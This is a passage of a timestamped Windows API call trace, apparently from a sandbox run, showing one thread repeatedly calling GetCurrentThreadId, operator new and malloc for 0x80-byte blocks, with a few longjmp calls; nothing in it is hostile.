	[0053.181] malloc (_Size=0x80) returned 0x3c8430
	[0053.196] GetCurrentThreadId () returned 0x9a8
	[0053.196] GetCurrentThreadId () returned 0x9a8
	[0053.196] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.196] malloc (_Size=0x80) returned 0x3c8af0
	[0053.198] GetCurrentThreadId () returned 0x9a8
	[0053.198] GetCurrentThreadId () returned 0x9a8
	[0053.198] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.198] malloc (_Size=0x80) returned 0x3c8430
	[0053.199] GetCurrentThreadId () returned 0x9a8
	[0053.199] GetCurrentThreadId () returned 0x9a8
	[0053.199] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.199] malloc (_Size=0x80) returned 0x3c8670
	[0053.201] GetCurrentThreadId () returned 0x9a8
	[0053.201] GetCurrentThreadId () returned 0x9a8
	[0053.201] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.201] malloc (_Size=0x80) returned 0x3c8820
	[0053.209] GetCurrentThreadId () returned 0x9a8
	[0053.209] GetCurrentThreadId () returned 0x9a8
	[0053.209] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.209] malloc (_Size=0x80) returned 0x3c8430
	[0053.212] GetCurrentThreadId () returned 0x9a8
	[0053.212] GetCurrentThreadId () returned 0x9a8
	[0053.212] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0053.212] malloc (_Size=0x80) returned 0x3c8b80
	[0053.218] GetCurrentThreadId () returned 0x9a8
	[0053.219] GetCurrentThreadId () returned 0x9a8
	[0053.219] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0053.219] malloc (_Size=0x80) returned 0x3c8af0
	[0053.220] GetCurrentThreadId () returned 0x9a8
	[0053.220] GetCurrentThreadId () returned 0x9a8
	[0053.220] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0053.220] malloc (_Size=0x80) returned 0x3c8820
	[0053.245] GetCurrentThreadId () returned 0x9a8
	[0053.245] GetCurrentThreadId () returned 0x9a8
	[0053.245] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.245] malloc (_Size=0x80) returned 0x3c8820
	[0053.248] GetCurrentThreadId () returned 0x9a8
	[0053.248] GetCurrentThreadId () returned 0x9a8
	[0053.248] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0053.248] malloc (_Size=0x80) returned 0x3c89d0
	[0053.253] GetCurrentThreadId () returned 0x9a8
	[0053.253] GetCurrentThreadId () returned 0x9a8
	[0053.253] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.253] malloc (_Size=0x80) returned 0x3c8670
	[0053.254] GetCurrentThreadId () returned 0x9a8
	[0053.254] GetCurrentThreadId () returned 0x9a8
	[0053.254] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0053.254] malloc (_Size=0x80) returned 0x3c89d0
	[0053.257] GetCurrentThreadId () returned 0x9a8
	[0053.257] GetCurrentThreadId () returned 0x9a8
	[0053.257] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0053.257] malloc (_Size=0x80) returned 0x3c8820
	[0053.257] GetCurrentThreadId () returned 0x9a8
	[0053.257] GetCurrentThreadId () returned 0x9a8
	[0053.257] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.257] malloc (_Size=0x80) returned 0x3c89d0
	[0053.258] GetCurrentThreadId () returned 0x9a8
	[0053.258] GetCurrentThreadId () returned 0x9a8
	[0053.258] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0053.258] malloc (_Size=0x80) returned 0x3c8a60
	[0053.259] GetCurrentThreadId () returned 0x9a8
	[0053.259] GetCurrentThreadId () returned 0x9a8
	[0053.259] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0053.259] malloc (_Size=0x80) returned 0x3c8940
	[0053.271] GetCurrentThreadId () returned 0x9a8
	[0053.271] GetCurrentThreadId () returned 0x9a8
	[0053.271] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0053.271] malloc (_Size=0x80) returned 0x3c83a0
	[0053.276] GetCurrentThreadId () returned 0x9a8
	[0053.276] GetCurrentThreadId () returned 0x9a8
	[0053.276] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.276] malloc (_Size=0x80) returned 0x3c8670
	[0053.286] GetCurrentThreadId () returned 0x9a8
	[0053.287] GetCurrentThreadId () returned 0x9a8
	[0053.287] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.287] malloc (_Size=0x80) returned 0x3c89d0
	[0053.300] GetCurrentThreadId () returned 0x9a8
	[0053.300] GetCurrentThreadId () returned 0x9a8
	[0053.300] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.300] malloc (_Size=0x80) returned 0x3c8670
	[0053.311] GetCurrentThreadId () returned 0x9a8
	[0053.311] GetCurrentThreadId () returned 0x9a8
	[0053.311] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0053.311] malloc (_Size=0x80) returned 0x3c8820
	[0053.312] GetCurrentThreadId () returned 0x9a8
	[0053.312] GetCurrentThreadId () returned 0x9a8
	[0053.312] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0053.312] malloc (_Size=0x80) returned 0x3c89d0
	[0053.312] GetCurrentThreadId () returned 0x9a8
	[0053.312] GetCurrentThreadId () returned 0x9a8
	[0053.312] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.312] malloc (_Size=0x80) returned 0x3c8700
	[0053.314] GetCurrentThreadId () returned 0x9a8
	[0053.314] GetCurrentThreadId () returned 0x9a8
	[0053.314] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0053.314] malloc (_Size=0x80) returned 0x3c8af0
	[0053.356] GetCurrentThreadId () returned 0x9a8
	[0053.356] GetCurrentThreadId () returned 0x9a8
	[0053.356] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0053.356] malloc (_Size=0x80) returned 0x3c8b80
	[0053.356] GetCurrentThreadId () returned 0x9a8
	[0053.356] GetCurrentThreadId () returned 0x9a8
	[0053.356] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0053.356] malloc (_Size=0x80) returned 0x3c85e0
	[0053.376] GetCurrentThreadId () returned 0x9a8
	[0053.376] GetCurrentThreadId () returned 0x9a8
	[0053.376] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0053.376] malloc (_Size=0x80) returned 0x3c89d0
	[0053.384] GetCurrentThreadId () returned 0x9a8
	[0053.384] GetCurrentThreadId () returned 0x9a8
	[0053.384] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0053.384] malloc (_Size=0x80) returned 0x3c83a0
	[0053.385] GetCurrentThreadId () returned 0x9a8
	[0053.385] GetCurrentThreadId () returned 0x9a8
	[0053.385] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0053.385] malloc (_Size=0x80) returned 0x3c8550
	[0053.389] GetCurrentThreadId () returned 0x9a8
	[0053.389] GetCurrentThreadId () returned 0x9a8
	[0053.389] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.389] malloc (_Size=0x80) returned 0x3c8af0
	[0053.437] GetCurrentThreadId () returned 0x9a8
	[0053.437] GetCurrentThreadId () returned 0x9a8
	[0053.437] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.437] malloc (_Size=0x80) returned 0x3c8670
	[0053.445] GetCurrentThreadId () returned 0x9a8
	[0053.446] GetCurrentThreadId () returned 0x9a8
	[0053.446] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0053.446] malloc (_Size=0x80) returned 0x3c8700
	[0053.483] GetCurrentThreadId () returned 0x9a8
	[0053.483] GetCurrentThreadId () returned 0x9a8
	[0053.483] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0053.483] malloc (_Size=0x80) returned 0x3c8940
	[0053.560] GetCurrentThreadId () returned 0x9a8
	[0053.560] GetCurrentThreadId () returned 0x9a8
	[0053.560] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0053.560] malloc (_Size=0x80) returned 0x3c8700
	[0053.611] GetCurrentThreadId () returned 0x9a8
	[0053.611] GetCurrentThreadId () returned 0x9a8
	[0053.611] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0053.611] malloc (_Size=0x80) returned 0x3c8b80
	[0053.893] GetCurrentThreadId () returned 0x9a8
	[0053.893] GetCurrentThreadId () returned 0x9a8
	[0053.893] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0053.893] malloc (_Size=0x80) returned 0x3c8820
	[0053.894] GetCurrentThreadId () returned 0x9a8
	[0053.894] GetCurrentThreadId () returned 0x9a8
	[0053.894] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0053.894] malloc (_Size=0x80) returned 0x3c8af0
	[0053.897] GetCurrentThreadId () returned 0x9a8
	[0053.897] GetCurrentThreadId () returned 0x9a8
	[0053.897] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.897] malloc (_Size=0x80) returned 0x3c8700
	[0053.905] GetCurrentThreadId () returned 0x9a8
	[0053.905] GetCurrentThreadId () returned 0x9a8
	[0053.905] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0053.905] malloc (_Size=0x80) returned 0x3c8a60
	[0053.906] GetCurrentThreadId () returned 0x9a8
	[0053.906] GetCurrentThreadId () returned 0x9a8
	[0053.907] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0053.907] malloc (_Size=0x80) returned 0x3c89d0
	[0053.907] GetCurrentThreadId () returned 0x9a8
	[0053.907] GetCurrentThreadId () returned 0x9a8
	[0053.907] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0053.907] malloc (_Size=0x80) returned 0x3c8550
	[0053.932] GetCurrentThreadId () returned 0x9a8
	[0053.932] GetCurrentThreadId () returned 0x9a8
	[0053.932] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0053.932] malloc (_Size=0x80) returned 0x3c83a0
	[0053.932] GetCurrentThreadId () returned 0x9a8
	[0053.932] GetCurrentThreadId () returned 0x9a8
	[0053.932] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0053.932] malloc (_Size=0x80) returned 0x3c8af0
	[0053.933] GetCurrentThreadId () returned 0x9a8
	[0053.933] GetCurrentThreadId () returned 0x9a8
	[0053.933] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.933] malloc (_Size=0x80) returned 0x3c8b80
	[0053.953] GetCurrentThreadId () returned 0x9a8
	[0053.953] GetCurrentThreadId () returned 0x9a8
	[0053.953] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0053.953] malloc (_Size=0x80) returned 0x3c8430
	[0053.953] GetCurrentThreadId () returned 0x9a8
	[0053.953] GetCurrentThreadId () returned 0x9a8
	[0053.953] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0053.953] malloc (_Size=0x80) returned 0x3c84c0
	[0053.954] GetCurrentThreadId () returned 0x9a8
	[0053.954] GetCurrentThreadId () returned 0x9a8
	[0053.954] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0053.954] malloc (_Size=0x80) returned 0x3c8ca0
	[0053.968] GetCurrentThreadId () returned 0x9a8
	[0053.968] GetCurrentThreadId () returned 0x9a8
	[0053.968] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0053.968] malloc (_Size=0x80) returned 0x3c8940
	[0053.978] GetCurrentThreadId () returned 0x9a8
	[0053.978] GetCurrentThreadId () returned 0x9a8
	[0053.978] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.978] malloc (_Size=0x80) returned 0x3c8700
	[0053.979] GetCurrentThreadId () returned 0x9a8
	[0053.979] GetCurrentThreadId () returned 0x9a8
	[0053.979] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0053.979] malloc (_Size=0x80) returned 0x3c8b80
	[0053.980] GetCurrentThreadId () returned 0x9a8
	[0053.980] GetCurrentThreadId () returned 0x9a8
	[0053.980] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.980] malloc (_Size=0x80) returned 0x3c8550
	[0053.981] GetCurrentThreadId () returned 0x9a8
	[0053.981] GetCurrentThreadId () returned 0x9a8
	[0053.981] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0053.981] malloc (_Size=0x80) returned 0x3c8b80
	[0053.991] GetCurrentThreadId () returned 0x9a8
	[0053.991] GetCurrentThreadId () returned 0x9a8
	[0053.991] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0053.991] malloc (_Size=0x80) returned 0x3c8af0
	[0053.996] GetCurrentThreadId () returned 0x9a8
	[0053.996] GetCurrentThreadId () returned 0x9a8
	[0053.996] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0053.996] malloc (_Size=0x80) returned 0x3c8820
	[0053.998] GetCurrentThreadId () returned 0x9a8
	[0053.998] GetCurrentThreadId () returned 0x9a8
	[0053.998] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0053.998] malloc (_Size=0x80) returned 0x3c8670
	[0054.009] GetCurrentThreadId () returned 0x9a8
	[0054.010] GetCurrentThreadId () returned 0x9a8
	[0054.010] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0054.010] malloc (_Size=0x80) returned 0x3c89d0
	[0054.042] GetCurrentThreadId () returned 0x9a8
	[0054.042] GetCurrentThreadId () returned 0x9a8
	[0054.042] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0054.042] malloc (_Size=0x80) returned 0x3c8820
	[0054.043] GetCurrentThreadId () returned 0x9a8
	[0054.043] GetCurrentThreadId () returned 0x9a8
	[0054.043] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0054.043] malloc (_Size=0x80) returned 0x3c89d0
	[0054.043] GetCurrentThreadId () returned 0x9a8
	[0054.043] GetCurrentThreadId () returned 0x9a8
	[0054.043] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.043] malloc (_Size=0x80) returned 0x3c8550
	[0054.045] GetCurrentThreadId () returned 0x9a8
	[0054.045] GetCurrentThreadId () returned 0x9a8
	[0054.045] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0054.045] malloc (_Size=0x80) returned 0x3c8af0
	[0054.046] GetCurrentThreadId () returned 0x9a8
	[0054.046] GetCurrentThreadId () returned 0x9a8
	[0054.046] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0054.046] malloc (_Size=0x80) returned 0x3c8550
	[0054.047] GetCurrentThreadId () returned 0x9a8
	[0054.047] GetCurrentThreadId () returned 0x9a8
	[0054.047] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.047] malloc (_Size=0x80) returned 0x3c8670
	[0054.050] GetCurrentThreadId () returned 0x9a8
	[0054.050] GetCurrentThreadId () returned 0x9a8
	[0054.050] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.050] malloc (_Size=0x80) returned 0x3c8430
	[0054.069] GetCurrentThreadId () returned 0x9a8
	[0054.069] GetCurrentThreadId () returned 0x9a8
	[0054.069] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.069] malloc (_Size=0x80) returned 0x3c8a60
	[0054.080] GetCurrentThreadId () returned 0x9a8
	[0054.080] GetCurrentThreadId () returned 0x9a8
	[0054.080] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0054.080] malloc (_Size=0x80) returned 0x3c8b80
	[0054.083] GetCurrentThreadId () returned 0x9a8
	[0054.083] GetCurrentThreadId () returned 0x9a8
	[0054.083] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0054.083] malloc (_Size=0x80) returned 0x3c8af0
	[0054.086] GetCurrentThreadId () returned 0x9a8
	[0054.086] GetCurrentThreadId () returned 0x9a8
	[0054.086] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0054.086] malloc (_Size=0x80) returned 0x3c8820
	[0054.106] GetCurrentThreadId () returned 0x9a8
	[0054.106] GetCurrentThreadId () returned 0x9a8
	[0054.106] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0054.106] malloc (_Size=0x80) returned 0x3c89d0
	[0054.106] GetCurrentThreadId () returned 0x9a8
	[0054.107] GetCurrentThreadId () returned 0x9a8
	[0054.107] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0054.107] malloc (_Size=0x80) returned 0x3c8550
	[0054.112] GetCurrentThreadId () returned 0x9a8
	[0054.112] GetCurrentThreadId () returned 0x9a8
	[0054.112] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0054.112] malloc (_Size=0x80) returned 0x3c8b80
	[0054.115] GetCurrentThreadId () returned 0x9a8
	[0054.115] GetCurrentThreadId () returned 0x9a8
	[0054.115] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0054.115] malloc (_Size=0x80) returned 0x3c8550
	[0054.127] GetCurrentThreadId () returned 0x9a8
	[0054.127] GetCurrentThreadId () returned 0x9a8
	[0054.127] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0054.127] malloc (_Size=0x80) returned 0x3c8b80
	[0054.131] GetCurrentThreadId () returned 0x9a8
	[0054.131] GetCurrentThreadId () returned 0x9a8
	[0054.131] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0054.131] malloc (_Size=0x80) returned 0x3c83a0
	[0054.132] GetCurrentThreadId () returned 0x9a8
	[0054.132] GetCurrentThreadId () returned 0x9a8
	[0054.132] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.132] malloc (_Size=0x80) returned 0x3c8430
	[0054.133] GetCurrentThreadId () returned 0x9a8
	[0054.133] GetCurrentThreadId () returned 0x9a8
	[0054.133] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.133] malloc (_Size=0x80) returned 0x3c8790
	[0054.146] GetCurrentThreadId () returned 0x9a8
	[0054.146] GetCurrentThreadId () returned 0x9a8
	[0054.146] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.146] malloc (_Size=0x80) returned 0x3c8790
	[0054.146] GetCurrentThreadId () returned 0x9a8
	[0054.146] GetCurrentThreadId () returned 0x9a8
	[0054.147] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.147] malloc (_Size=0x80) returned 0x3c8700
	[0054.169] GetCurrentThreadId () returned 0x9a8
	[0054.170] GetCurrentThreadId () returned 0x9a8
	[0054.170] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.170] malloc (_Size=0x80) returned 0x3c8a60
	[0054.170] GetCurrentThreadId () returned 0x9a8
	[0054.170] GetCurrentThreadId () returned 0x9a8
	[0054.170] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.170] malloc (_Size=0x80) returned 0x3c8670
	[0054.178] GetCurrentThreadId () returned 0x9a8
	[0054.178] GetCurrentThreadId () returned 0x9a8
	[0054.178] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.178] malloc (_Size=0x80) returned 0x3c84c0
	[0054.179] GetCurrentThreadId () returned 0x9a8
	[0054.179] GetCurrentThreadId () returned 0x9a8
	[0054.179] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.179] malloc (_Size=0x80) returned 0x3c8700
	[0054.194] GetCurrentThreadId () returned 0x9a8
	[0054.194] GetCurrentThreadId () returned 0x9a8
	[0054.194] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.194] malloc (_Size=0x80) returned 0x3c8670
	[0054.195] GetCurrentThreadId () returned 0x9a8
	[0054.195] GetCurrentThreadId () returned 0x9a8
	[0054.195] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.195] malloc (_Size=0x80) returned 0x3c8ca0
	[0054.213] GetCurrentThreadId () returned 0x9a8
	[0054.213] GetCurrentThreadId () returned 0x9a8
	[0054.213] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.213] malloc (_Size=0x80) returned 0x3c8700
	[0054.213] GetCurrentThreadId () returned 0x9a8
	[0054.213] GetCurrentThreadId () returned 0x9a8
	[0054.213] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.213] malloc (_Size=0x80) returned 0x3c8430
	[0054.225] GetCurrentThreadId () returned 0x9a8
	[0054.225] GetCurrentThreadId () returned 0x9a8
	[0054.225] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.225] malloc (_Size=0x80) returned 0x3c8ca0
	[0054.226] GetCurrentThreadId () returned 0x9a8
	[0054.226] GetCurrentThreadId () returned 0x9a8
	[0054.226] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.226] malloc (_Size=0x80) returned 0x3c8790
	[0054.231] GetCurrentThreadId () returned 0x9a8
	[0054.231] GetCurrentThreadId () returned 0x9a8
	[0054.231] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.231] malloc (_Size=0x80) returned 0x3c8a60
	[0054.237] GetCurrentThreadId () returned 0x9a8
	[0054.237] GetCurrentThreadId () returned 0x9a8
	[0054.237] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.237] malloc (_Size=0x80) returned 0x3c8a60
	[0054.237] GetCurrentThreadId () returned 0x9a8
	[0054.238] GetCurrentThreadId () returned 0x9a8
	[0054.238] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.238] malloc (_Size=0x80) returned 0x3c8670
	[0054.248] GetCurrentThreadId () returned 0x9a8
	[0054.249] GetCurrentThreadId () returned 0x9a8
	[0054.249] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.249] malloc (_Size=0x80) returned 0x3c8430
	[0054.290] GetCurrentThreadId () returned 0x9a8
	[0054.290] GetCurrentThreadId () returned 0x9a8
	[0054.290] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0054.290] malloc (_Size=0x80) returned 0x3c89d0
	[0054.291] GetCurrentThreadId () returned 0x9a8
	[0054.291] GetCurrentThreadId () returned 0x9a8
	[0054.291] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0054.291] malloc (_Size=0x80) returned 0x3c83a0
	[0054.291] GetCurrentThreadId () returned 0x9a8
	[0054.291] GetCurrentThreadId () returned 0x9a8
	[0054.291] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.291] malloc (_Size=0x80) returned 0x3c8ca0
	[0054.291] GetCurrentThreadId () returned 0x9a8
	[0054.291] GetCurrentThreadId () returned 0x9a8
	[0054.291] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.292] malloc (_Size=0x80) returned 0x3c8a60
	[0054.292] GetCurrentThreadId () returned 0x9a8
	[0054.292] GetCurrentThreadId () returned 0x9a8
	[0054.292] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.292] malloc (_Size=0x80) returned 0x3c8430
	[0054.293] GetCurrentThreadId () returned 0x9a8
	[0054.293] GetCurrentThreadId () returned 0x9a8
	[0054.293] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.293] malloc (_Size=0x80) returned 0x3c8820
	[0054.299] longjmp () 
	[0054.300] longjmp () 
	[0054.300] longjmp () 
	[0054.300] longjmp () 
	[0054.301] GetCurrentThreadId () returned 0x9a8
	[0054.301] GetCurrentThreadId () returned 0x9a8
	[0054.301] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0054.301] malloc (_Size=0x80) returned 0x3c8ca0
	[0054.301] GetCurrentThreadId () returned 0x9a8
	[0054.301] GetCurrentThreadId () returned 0x9a8
	[0054.301] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.301] malloc (_Size=0x80) returned 0x3c8b80
	[0054.301] GetCurrentThreadId () returned 0x9a8
	[0054.301] GetCurrentThreadId () returned 0x9a8
	[0054.301] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.301] malloc (_Size=0x80) returned 0x3c8790
	[0054.302] GetCurrentThreadId () returned 0x9a8
	[0054.302] GetCurrentThreadId () returned 0x9a8
	[0054.302] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.302] malloc (_Size=0x80) returned 0x3c8670
	[0054.310] GetCurrentThreadId () returned 0x9a8
	[0054.310] GetCurrentThreadId () returned 0x9a8
	[0054.310] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.310] malloc (_Size=0x80) returned 0x3c8820
	[0054.310] GetCurrentThreadId () returned 0x9a8
	[0054.310] GetCurrentThreadId () returned 0x9a8
	[0054.310] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.310] malloc (_Size=0x80) returned 0x3c8a60
	[0054.311] GetCurrentThreadId () returned 0x9a8
	[0054.312] GetCurrentThreadId () returned 0x9a8
	[0054.312] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.312] malloc (_Size=0x80) returned 0x3c8790
	[0054.315] GetCurrentThreadId () returned 0x9a8
	[0054.315] GetCurrentThreadId () returned 0x9a8
	[0054.315] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.316] malloc (_Size=0x80) returned 0x3c8310
	[0054.316] GetCurrentThreadId () returned 0x9a8
	[0054.316] GetCurrentThreadId () returned 0x9a8
	[0054.316] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.316] malloc (_Size=0x80) returned 0x3c8670
	[0054.324] GetCurrentThreadId () returned 0x9a8
	[0054.324] GetCurrentThreadId () returned 0x9a8
	[0054.324] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.324] malloc (_Size=0x80) returned 0x3c8a60
	[0054.327] GetCurrentThreadId () returned 0x9a8
	[0054.327] GetCurrentThreadId () returned 0x9a8
	[0054.327] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.327] malloc (_Size=0x80) returned 0x3c8430
	[0054.335] GetCurrentThreadId () returned 0x9a8
	[0054.335] GetCurrentThreadId () returned 0x9a8
	[0054.335] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.336] malloc (_Size=0x80) returned 0x3c8790
	[0054.340] GetCurrentThreadId () returned 0x9a8
	[0054.340] GetCurrentThreadId () returned 0x9a8
	[0054.340] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.340] malloc (_Size=0x80) returned 0x3c8670
	[0054.341] GetCurrentThreadId () returned 0x9a8
	[0054.341] GetCurrentThreadId () returned 0x9a8
	[0054.341] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.341] malloc (_Size=0x80) returned 0x3c8310
	[0054.342] GetCurrentThreadId () returned 0x9a8
	[0054.342] GetCurrentThreadId () returned 0x9a8
	[0054.343] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.343] malloc (_Size=0x80) returned 0x3c8820
	[0054.343] GetCurrentThreadId () returned 0x9a8
	[0054.343] GetCurrentThreadId () returned 0x9a8
	[0054.343] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.343] malloc (_Size=0x80) returned 0x3c8430
	[0054.346] GetCurrentThreadId () returned 0x9a8
	[0054.346] GetCurrentThreadId () returned 0x9a8
	[0054.346] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.346] malloc (_Size=0x80) returned 0x3c8670
	[0054.347] GetCurrentThreadId () returned 0x9a8
	[0054.347] GetCurrentThreadId () returned 0x9a8
	[0054.347] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.347] malloc (_Size=0x80) returned 0x3c8820
	[0054.347] GetCurrentThreadId () returned 0x9a8
	[0054.348] GetCurrentThreadId () returned 0x9a8
	[0054.348] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.348] malloc (_Size=0x80) returned 0x3c8310
	[0054.352] GetCurrentThreadId () returned 0x9a8
	[0054.352] GetCurrentThreadId () returned 0x9a8
	[0054.352] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.352] malloc (_Size=0x80) returned 0x3c8430
	[0054.353] GetCurrentThreadId () returned 0x9a8
	[0054.353] GetCurrentThreadId () returned 0x9a8
	[0054.353] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.353] malloc (_Size=0x80) returned 0x3c8a60
	[0054.380] GetCurrentThreadId () returned 0x9a8
	[0054.381] GetCurrentThreadId () returned 0x9a8
	[0054.381] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.381] malloc (_Size=0x80) returned 0x3c8a60
	[0054.382] GetCurrentThreadId () returned 0x9a8
	[0054.382] GetCurrentThreadId () returned 0x9a8
	[0054.382] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.382] malloc (_Size=0x80) returned 0x3c8310
	[0054.384] GetCurrentThreadId () returned 0x9a8
	[0054.384] GetCurrentThreadId () returned 0x9a8
	[0054.384] ??2@YAPEAX_K@Z () returned 0x3e4200
	[0054.384] malloc (_Size=0x80) returned 0x3c8820
	[0054.385] GetCurrentThreadId () returned 0x9a8
	[0054.385] GetCurrentThreadId () returned 0x9a8
	[0054.385] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0054.385] malloc (_Size=0x80) returned 0x3c8b80
	[0054.386] GetCurrentThreadId () returned 0x9a8
	[0054.386] GetCurrentThreadId () returned 0x9a8
	[0054.386] ??2@YAPEAX_K@Z () returned 0x3e4500
	[0054.386] malloc (_Size=0x80) returned 0x3c8670
	[0054.389] GetCurrentThreadId () returned 0x9a8
	[0054.389] GetCurrentThreadId () returned 0x9a8
	[0054.389] ??2@YAPEAX_K@Z () returned 0x3e4400
	[0054.389] malloc (_Size=0x80) returned 0x3c84c0
	[0054.390] GetCurrentThreadId () returned 0x9a8
	[0054.390] GetCurrentThreadId () returned 0x9a8
	[0054.390] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0054.390] malloc (_Size=0x80) returned 0x3c8700
	[0054.392] GetCurrentThreadId () returned 0x9a8
	[0054.392] GetCurrentThreadId () returned 0x9a8
	[0054.392] ??2@YAPEAX_K@Z () returned 0x3e4600
	[0054.392] malloc (_Size=0x80) returned 0x3c8940
	[0054.392] GetCurrentThreadId () returned 0x9a8
	[0054.393] GetCurrentThreadId () returned 0x9a8
	[0054.393] ??2@YAPEAX_K@Z () returned 0x3e4700
	[0054.393] malloc (_Size=0x80) returned 0x3c8d30
	[0054.393] GetCurrentThreadId () returned 0x9a8
	[0054.393] GetCurrentThreadId () returned 0x9a8
	[0054.393] ??2@YAPEAX_K@Z () returned 0x3e4800
	[0054.393] malloc (_Size=0x80) returned 0x3c8c10
